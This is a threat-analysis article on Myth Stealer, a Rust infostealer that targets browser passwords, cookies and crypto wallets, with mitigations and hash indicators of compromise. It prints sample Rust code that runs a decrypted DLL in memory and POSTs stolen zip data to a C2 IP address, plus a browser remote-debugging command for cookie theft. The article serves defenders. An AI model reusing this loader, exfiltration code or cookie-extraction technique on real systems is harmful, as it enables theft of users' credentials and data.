Rust-Based ‘Myth Stealer’ Hits Chromium Browsers, Harvests Passwords & Cookies

A new and rapidly evolving malware threat, Myth Stealer, written entirely in Rust, is actively targeting users of Chromium-based browsers including Google Chrome, Microsoft Edge, Brave, and Opera alongside Gecko-based browsers like Firefox.

Discovered by Trellix Advanced Research Center, this infostealer employs novel evasion techniques and highly modular code to steal sensitive user data, including passwords, cookies, credit card details, and more.

Originally distributed as a free trial on Telegram in late 2024, Myth Stealer has since transformed into a paid subscription service, facilitating cybercrime at scale.

Technical Dissection: Evasion, Extraction, and Exfiltration

Loader and Fake Window Mechanism

Upon execution, Myth Stealer displays a convincing fake window using Rust crates like native-windows-gui, egui, or native_dialog to trick users into believing a legitimate application is running.

Simultaneously, the loader decrypts the main stealer payload in memory using custom algorithms or cryptographic routines (XOR/AES, leveraging crates such as include-crypt). The decrypted payload is a 64-bit Rust DLL with key exports (DllMain and bz_internal_error), executed stealthily with the memexec crate.

Code Excerpt: Loader Decrypting and Executing DLL

rustuse include_crypt::decrypt_aes;
let encrypted_bytes = include_bytes!("stealer_payload.aes");
let key = b"supersecretkey!"; // Key is hardcoded or obfuscated
let decrypted_payload = decrypt_aes(encrypted_bytes, key);
memexec::exec(&decrypted_payload); // Execute DLL in-memory

Anti-Analysis and Obfuscation

Myth Stealer uses the obfstr crate for string obfuscation, hindering static analysis and signature-based detection. For example, strings are XOR’d and resolved at runtime via custom functions. Sandboxing checks are performed by scanning for known forensic usernames and VM-related system files. If detected, the malware self-terminates, thwarting sandbox analysis.

Obfstr Deobfuscation Workflow (Reverse Engineering)

• Locate calls to obfstr::xref::inner.
• Extract operands and re-emulate the XOR/decryption logic.
• Patch binary with recovered strings for rapid static analysis.

Data Harvesting: Passwords, Cookies, Clipboard

Myth Stealer targets a broad spectrum of browsers and apps:

• Chromium browsers (Chrome, Edge, Opera, Brave, Vivaldi, etc.)
• Gecko browsers (Firefox)
• Discord and its variants

For Chromium, it leverages the browser’s remote debugging mode to extract cookies:

textchromium.exe --remote-debugging-port=9222 --user-data-dir=<victimdir> --headless

Once privileged, it attempts to elevate using the Windows API ShellExecuteW with runas. Clipboard hijacking is also implemented to intercept and replace cryptocurrency wallet addresses in flight, redirecting funds to attacker-controlled wallets.

Data Exfiltration and Persistence

Harvested data is packed into a zip file, reversed at the byte level, and sent via HTTP POST requests to a C2 server (example: 185[.]224[.]3[.]219:8080/api/send). Each request includes custom headers (myth-key/key), further shrouding communications.

Zip File Exfiltration Logic

rustlet mut zip_file = fs::read("harvested_data.zip")?;
zip_file.reverse(); // Simple byte reversal for obfuscation
let client = reqwest::blocking::Client::new();
let res = client.post("http://185.224.3.219:8080/api/send")
    .header("key", "unique-myth-key")
    .body(zip_file)
    .send()?;

Data points exfiltrated include:

• Saved passwords, cookies, autofills, credit cards
• Browser session tokens
• Screenshots after fetching the external IP with a GET request to ipify.org

The malware maintains persistence by copying itself to AppData\Roaming\winlnk.exe and creating a .lnkk shortcut in the startup directory, registered via custom registry keys.

The Growing Threat: Rapid Adaptation and Defensive Measures

The developers behind Myth Stealer are running a well-organized operation, offering subscriptions via cryptocurrency and maintaining rapid update cycles to bypass antivirus solutions. Updates are announced via Telegram channels, while stolen credentials are traded in dark marketplaces.

Mitigation Recommendations:

• Monitor for suspicious processes utilizing browser debugging ports.
• Audit startup folders and registry for unauthorized executables and .lnkk entries.
• Employ endpoint detection with behavioral analysis to catch in-memory and obfuscated threats.

Myth Stealer exemplifies a new wave of Rust-based malware: robust, evasive, and modular—posing a formidable challenge for defenders across the globe. As browser threats escalate, proactive threat hunting and consistent user awareness remain essential.

Indicators of compromise

SHA256	Name
1847288195fcfc03fc186bf4eead4268048ef5e082dedb963b3450ee07c23883	loader.exe
65a84024daf30c12fd2e76db661bf6e85f3da30bb3aaa7e774152855d718b0c4	myth.exe
e5d09da6648add4776de8091b0182b935405791bf41476465b0e7dcb066fc0dc	myth.exe
f7cb6626e311181d9ded9536b1fbdf709b8254abd8d0810e04cebefea2fed131	Mythic Guardian.exe
acd66cb5f1447b803245c495400ad0886352920e35defcca6c45519fb7d33693	myth.exe
c7ae9d808e97fe6d6bf97aaf0775b9b6e68449f10bcc933bf07ba9d34d75a379	Pckr.exe
6c54e6648a6a33583d7707a9f7c5e83dd08ed481df6354c52e8f81e729d74a82	Myth-Voice-Changer.exe
7e2bed39eea850960a0d043e6e671154f413f5fe2cc7cafe6d92c903b3a2e8d1	build-213.exe (free trial version)
b180f6f9f7eb0bb1a12a7e7c8216499366419b1083c84c4af5b0ee69b3016186	krx ultimate crack 1.31.rar
0631a62a173833c7c821989e63f77632ecce30ca5a7049db4898ff0505abf32e	Krx Clinet.exe